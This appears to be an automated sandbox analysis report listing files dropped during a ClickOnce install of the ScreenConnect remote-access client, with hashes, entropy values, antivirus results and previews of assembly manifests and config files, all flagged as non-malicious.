                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                                        Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                        MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                        SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                        SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                        SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                        Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                        MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                        SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                        SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):548352
                                                                                                                                                                                                                                                        Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                        MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                        SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                        SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                        SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                                        Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                        MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                        SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                        SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                        SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                        Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                        MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                        SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                        SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                        SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                                        Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                        MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                        SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                        SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                        SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                        Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                        MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                        SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                        SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                        SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):600864
                                                                                                                                                                                                                                                        Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                        MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                        SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                        SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                                        Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                        MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                        SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                        SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                        SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                                        Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                        MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                        SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                        SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                        SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                        Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                        MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                        SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                        SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                        SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):87
                                                                                                                                                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                        MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                        SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                        SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                        SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1121
                                                                                                                                                                                                                                                        Entropy (8bit):5.342215969645725
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
                                                                                                                                                                                                                                                        MD5:4F13BE23AEC301E86C0DE5CB433E8C51
                                                                                                                                                                                                                                                        SHA1:1E2D836615D5F58BE6F783DE3419B72145C67328
                                                                                                                                                                                                                                                        SHA-256:B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
                                                                                                                                                                                                                                                        SHA-512:C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                        Entropy (8bit):4.3938119652396646
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:Ml4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNArOBSqa:E4vF0MYQUMM6VFYSrU
                                                                                                                                                                                                                                                        MD5:689C4E48F6096B43C2FD4640B881917F
                                                                                                                                                                                                                                                        SHA1:35F9D8BFDFB8C413C19CE844AC49B1494C6C06DD
                                                                                                                                                                                                                                                        SHA-256:EC9D1751AEFAA3C24E6CBE2E1868876F4C67C6BD02805EBD435C06638C5578BA
                                                                                                                                                                                                                                                        SHA-512:02CF34230FBC734DCD03C165E8B491AC7100E83208CEA291A514C4C2A9725A7A64537F1FB79E69589E437B34A3A05F38C57BC94591813265CF280E33192F5B8B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
